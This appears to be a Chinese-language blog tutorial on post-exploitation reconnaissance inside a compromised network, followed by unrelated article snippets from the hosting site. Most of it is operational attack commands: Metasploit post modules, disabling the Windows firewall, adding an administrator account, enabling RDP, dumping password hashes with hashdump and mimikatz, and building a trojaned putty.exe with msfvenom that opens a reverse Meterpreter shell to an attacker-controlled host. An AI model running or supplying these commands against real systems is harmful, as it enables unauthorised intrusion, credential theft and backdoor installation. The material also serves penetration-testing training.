内网渗透-内网信息收集

news2024/12/27 12:33:14

内网信息收集

前言

当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们需要扩大渗透的战果时,这是我们就要进行内网的渗透了,内网渗透最重要的还是前期的信息收集的操作了,就是我们的内网信息收集了,信息收集需要收集什么内容,对后期的横向和纵向移动都有很大的帮助。接下来给大家总结一下内网渗透中的信息收集的模块内容。

msf模块中的信息收集

Msf模块
run post/
run post/windows/gather/
获取系统的分区情况
forensics(取证的模块)
run post/windows/gather/forensics/enum_drives

检测是否是虚拟机
run post/windows/gather/checkvm

靶机运行了哪些服务
run post/windows/gather/enum_services

安装了哪些应用
run post/windows/gather/enum_applications

是否有文件共享
run post/windows/gather/enum_shares

最近的操作
run post/windows/gather/dumplinks

安装了哪些补丁
run post/windows/gather/enum_patches

信息收集
scraper(是个脚本)
run scraper
收集完之后,会加载在指定文件
到文件中查看收集内容
cd /root/.msf4/log/scripts/
ls
cd scraper/
ls
cd 到指定的文件
ls
cat zhi.txt

显示乱码的话
chcp 65001
回到正常编码

run winenum
查看系统的路由,文件

msf反弹shell后的信息收集

MSF反弹shell
chcp 65001(返回的是utf-8的代码)

netsh advfirewall set allprofiles state off(关闭防火墙)
netsh advfirewall show allprofiles(查看所有配置)

shutdown -r -f -t 0(-f 强制重启),立即重启

看看3389端口
打开3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e

利用该命令,在目标主机上添加用户
run getgui -u admin -p admin (设置密码是)
net localgroup adminstrators admin /add

(1)MSF信息收集
远程桌面连接
window(mstsce)
kali (rdesktop -u username -p password ip)

获取哈希值

查看远程桌面
screenshot
use espia
screengrab
screenshare

得到哈希值密码破解时权限不够
如何提高权限
pid迁移

getpid
ps 查进程,找NT SYSTEM的进程pid,svhost
pid迁移,migrating pid
getuid
hashdump 获得哈希值
(2)凭证信息收集
window密码破解工具

mimikatz
(在内存中获取的密码)
https://github.com/gentilkiwi/mimikatz/releases(win10下载网址)
在window下使用是需要管理员权限的
图片中是获得明文密码的语句
privilege::debug //提升权限
2.wce
wce.exe -w 获取明文密码(只适用于win7的低版本)

3.pwddump7
得到hash值后可以放到这个网站去进行破解得到明文
https://www.objectif-securite.ch/ophcrack

http://www.cmd5.com/Default.aspx

4.procdump(免查杀的功能)

内网信息收集

先查看是否存在域

查看网段(s扫描器)
s.exe syn 192.168.0.0 192.168.255.255 80

抓包分析网络流量(分析流量看网段)meterpreter 抓取目标机所在网络流量

看进程
tasklist
netstat -ano
netstat -lntp(linux)

systeminfo(查看补丁列表)
net share

net user 查看本机共享列表和课访问的域共享列表
net localgroup admininistrators

query user || qwinsta 查看在线用户

route print(查看路由)

arp -a(同一网段的缓存表)

关闭防火墙
netsh advfirewall set allprofiles state off(03以后)
net sh firewall show config(查看防火墙配置)

netsh(可用于端口转发,连接内网时用)

域环境信息收集
远程登录不安全,用msf反弹shell比较安全

whoami /all(查看SID域账号,用于后面的票据伪造)

net user /domain 域中的用户
net time /domain 查看域控
net group “Domain computer” /domain 查看域控制器组

nbtscan(扫描同一网段中有哪些主机)

net view /domain 查询域
net group “domain computers” /domain 查询所有与成员计算机列表
cls 清屏
net accounts /domain 获取域密码信息

域内管理员信息
net group “domain admins” /domain 查询域管理员用户

msf加载powershell脚本进行信息收集

msf中信息收集工具
在会话中输入run winenum

powersploit
ls
找到路径
cd Recon
回到会话中
load powershell
powershell_import 刚刚的Recon的路径/PowerView.ps1
加载成功

powershell_execute get-NetDomain 查看当前的域有哪些
powershell_execute get-NetUser 当前的用户

powershell_execute get-NetComputer 扫域名
powershell_execute get-NetProcess 进程

扫端口
powershell_import 刚刚的Recon的路径/Invoke-Portscan.ps1
powershell_execute invoke-portscan 192.168.8.1,192.168.8.200 -ports “21,22,80,445,139”

empire(域渗透,内网收集)(在kali中打开)
./empire

我在kali中给大家演示一下powershell中的powersploit脚本,进行信息收集
首先就是在msf中生成一个后门程序shell.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.128 lport=4444 -x putty.exe -e x86/shikata_ga_nai -f exe -o shell.exe

将shell.exe上传到靶机中,点击回连shell,在kali中进行监听,在kali中打开msf,设置参数,进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.231.128
set lport 4444
run

进行一系列设置后,我们点击程序,发现返回了会话。
我们在kali中打开powersploit,找到这这个脚本,PowerView.ps1

找到这个路径
/usr/share/windows-resources/powersploit/Recon
/usr/share/windows-resources/powersploit/Recon/PowerView.ps1

在回到msf中加载powershell
load powershell

导入模块
powershell_import /usr/share/windows-resources/powersploit/Recon//Powerview.ps1

执行脚本
powershell_execute get-NetDomain

我这里由于是用我本机做的实验,可能拿到的权限不是很高,所以不能做下一步的收集,但是对于win7的机器还是可以进行信息收集的

我们进行端口扫描
导入模块
powershell_import /usr/share/windows-resources/powersploit/Recon/Invoke-Portscan.ps1

执行脚本
powershell_execute invoke-portscan 192.168.219.1,192.168.219.200 -ports “21,22,80,445,139”
端口扫描成功了。我们看看另外一个扫描方法吧。
run winenum

这里进行一系列自动化的信息收集,,将扫描结果输出到报告中,这里显示输出到以下文档中
/root/.msf4/logs/scripts/winenum/LAPTOP-5QFMU9N1_20220920.4003/LAPTOP-5QFMU9N1_20220920.4003.txt

我们进行查看文档

可能还是因为权限的问题,只能扫到这么多的信息了,但对于其他靶机来说,应该会有更全面的扫描结果的。

后记

内网的信息收集就讲解到这了,渗透的信息收集至关重要,对于后渗透阶段,有着举足轻重的作用,直接决定着后渗透阶段的战果如何。后面还有内网的代理穿透,以及横向移动,权限维持,痕迹清除等阶段,有时间,都会给大家总结的噢。

                                     黑客渗透视频教程下方免费领~

免费领取安全学习资料包!(私聊进群一起学习,共同进步)icon-default.png?t=N7T8https://docs.qq.com/doc/DRGJHbUxpTWR2Y3lq

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1135605.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

文件加密丨最值得收藏的3种方法

信息的安全性变得越来越重要。文件加密作为一种有效的信息安全保护手段,广泛应用于各类场景。 今天就分享3种值得小白收藏的文件加密的方法: 方法一 简单加密 简单加密是一种常见的文件加密方法,其原理是通过使用简单的加密算法和密钥&…

YUV格式详解

YUV 可以将亮度信息(Y)与色度信息(UV)分离,没有UV信息一样可以显示完整图像,只不过是黑白的,也是一种颜色编码方法,,YUV和RGB可以通过公式互相转换,图片中每一个像素的颜…

响应式网站建站源码系统+完整的搭建教程

互联网已成为人们生活中不可或缺的一部分。在这个信息爆炸的时代,企业和个人对网站的需求不再仅仅是展示信息,而是要求网站能够适应各种设备、屏幕尺寸和网络环境,以便更好地与用户进行互动。因此,响应式网站建设应运而生&#xf…

使用Jenkins触发gitlab的webhook

满足条件: 首先手动构建可以完成构建 例如: 打开项目点击配置 在“Build Triggers”栏勾选,Build when a change is pushed to GitLab. GitLab webhook ;如下 复制URL链接,我的链接是:http://192.168.44…

23款奔驰E300L升级几何多光束大灯 车辆自检等功能

奔驰几何多光束大灯核心特点就是通过内部的84颗可独立控制的LED光源,行车远光灯会甄别对向驶来的车辆或者行人,并且动态的跟随目标,之后阴影话该区域,避免晃到车辆和行人。 奔驰升级几何多光束 LED 大灯(MULTIBEAM LED…

TypeError: data.reduce is not a function:数据类型不匹配

错误展示: 错误分析: 首先来看看前端代码:我表格绑定的数据模型是tableData,而我tableData定义的是一个数组 其次看看后端给的数据: 传递的是一个对象,而不是一个数组! 这样原因就找出了&…

Spring如何使用三级缓存解决循环依赖问题?

Spring框架中采用了"三级缓存"(三级缓存是一种缓存解决循环依赖的数据结构)来解决循环依赖问题,其中缓存包括singletonObjects、earlySingletonObjects和singletonFactories。 第一级缓存 - singletonObjects: 在Spr…

Qt跨平台(统信UOS)各种坑解决办法

记录Qt跨平台的坑,方便日后翻阅。 一、环境安装 本人用的是qt 5.14.2.直接在官网下载即可。地址:Index of /archive/qt/5.14/5.14.2 下载linux版本。 下载之后 添加可执行权限。 chmod 777 qt-opensource-linux-x64-5.14.2.run 然后执行。 出现坑1…

个头小却很能“打”!合合信息扫描全能王推出A4便携式打印机

过去,为了打印一份清晰工整的材料,人们往往需要到专门的打印店或办公室。处理文件。对于销售、物流人员、工程师、医生、媒体记者等出差频率较高的职业而言,打印是一项“不太友好”的需求。为解决移动打印难题,近期,合…

嵌入式学习笔记(63)指针到底是什么

3.1.1.指针变量和普通变量的区别 首先必须非常明确:指针的实质就是个变量,它跟普通变量没有任何本质区别。指针完整的名字叫指针变量,简称指针。 3.1.2.为什么需要指针 (1)指针的出现是为了实现间接访问。在汇编中都有间接访问&#xff08…

众和策略可靠吗?b股指数是什么代码?

可靠 B股指数(BShare Index)是指由上海证券买卖所和深圳证券买卖所一起编制的反映我国两个证券商场B股出资价值变化的指数。作为我国证券商场中的重要指数之一,许多出资者都想了解B股指数的代码是什么。 B股指数代码 B股指数代码是指B股买卖…

应届生如何找到适合自己的项目

去开源网站 搜索技术点项目, 按照星级排序 不要只是跟着敲代码 那样什么都学不到,脑子是停转的 要自己理解业务流程,然后自己先试着实现,简单的crud要会,复杂的肯定会遇到问题,这个时候再去参考他给的代码 选择以下比较通用的业务来深度耕耘 模块如何吃透 例如权限认证: 功能实…

MutationObserver详解

MutationObserver API 让我们能监听 DOM 树变化,该 API 设计用来替换掉在 DOM 3 事件规范中引入的 Mutation events。 Mutation events 是同步触发的,每次变动都会触发一次调用。 MutationObserver API 是异步触发的, DOM 的变动并不会马上触…

YOLOv5— Fruit Detection

🍨 本文为[🔗365天深度学习训练营学习记录博客 🍦 参考文章:365天深度学习训练营-第7周:咖啡豆识别(训练营内部成员可读) 🍖 原作者:[K同学啊 | 接辅导、项目定制](https…

重庆助理工程师申请步骤及注意事项

目录 一、前言二、步骤1. 职称系统网址 2. 一定使用谷歌浏览器,其他白搭三、材料准备1.思想和工作-要手写签字并盖单位公章,无模板2.近五年年度考核-填优秀,并改单位公章,无模板 四、流程1.单位公示要公示5个工作日,再…

量化网络的注意事项

二,量化算术 模型量化过程可以分为两部分:将模型从 FP32 转换为 INT8,以及使用 INT8 进行推理。本节说明这两部分背后的算术原理。如果不了解基础算术原理,在考虑量化细节时通常会感到困惑。 2.1,定点和浮点 定点和…

【密评】商用密码应用安全性评估从业人员考核题库(十三)

商用密码应用安全性评估从业人员考核题库(十三) 国密局给的参考题库5000道只是基础题,后续更新完5000还会继续更其他高质量题库,持续学习,共同进步。 3001 单项选择题 在GM/T 0082 《可信密码模块保护轮廓》中&#x…

多测师肖sir_高级金牌讲师__接口测试之练习题(6.1)

常见的接口面试题目: 1.postman接口测试,它有一个功能可以设置参数化,你有用过吗? 用过 (1)新建一个csv.文件 填写user、pwd 新建一个全局变量 user、pwd 点击bodyform-data 填写user、pwd 点击run 导入csv.件 查看结果 &#x…

C语言重点突破(四)自定义类型详解

前言 本文意在介绍C语言里的常规自定义类型,它是C语言里最重要的概念之一,是我们从简单使用C语言到综合运用必不可少的知识之一,在C语言中具有重要的地位和作用,掌握自定义类型的使用方法和技巧对于写出高质量的C程序是非常重要的…

链表顺序表—优缺点对比

目录 链表: 优点: 缺点: 顺序表: 缺点: 优点: 链表: 优点: 1、任意位置插入删除O(1) 2、按需申请释放空间 缺点: 1、不支持下标随机访问 2、CPU高速缓存命中率…